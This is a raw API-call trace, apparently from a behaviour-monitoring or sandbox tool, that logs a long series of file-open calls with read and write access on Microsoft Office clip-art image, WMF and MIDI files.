Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382944.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382947.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382948.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382950.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382952.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382954.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382955.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382957.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382958.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382959.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382960.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382961.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382962.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382963.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382965.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382966.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382967.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382968.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382969.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382970.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0384862.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0384885.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0384888.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0384895.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0384900.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0386120.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0386267.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0386270.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0386485.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0386764.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0387337.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0387578.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0387591.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0387604.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0387882.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0387895.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0390072.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400001.PNG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400002.PNG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400003.PNG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400004.PNG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400005.PNG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\JAVA_01.MID desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\JNGLE_01.MID desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\MP00021_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\MP00132_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\MP00646_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\MUSIC_01.MID desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00042_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00057_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00058_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00068_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00238_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00330_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00388_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00389_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00390_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00391_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00394_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00395_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00396_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00417_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00433_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00438_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00452_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00454_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00458_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00462_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00487_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00494_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00512_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00523_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00525_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00530_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00532_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00538_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00641_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00784_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00798_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00806_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00807_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00808_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00809_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00810_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00932_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01064_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01066_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01069_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01123_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01126_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01130_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01141_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01148_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01149_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01152_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01154_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01157_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01158_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01161_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01164_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01293_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01354_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01356_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01357_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01358_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01361_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01368_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01421_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01468_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01470_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01472_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01473_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01474_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01627_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01680_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01682_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01701_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01848_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01849_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01852_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01858_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01866_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02009_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02041_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02066_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02091_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02092_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02093_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02124_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02125_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02126_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02127_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02262_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02264_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02356_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02361_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02368_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02371_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02373_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02384_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02386_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02388_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02389_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02390_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02398_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02400_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02404_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02405_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02407_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02413_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02417_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02423_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02424_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
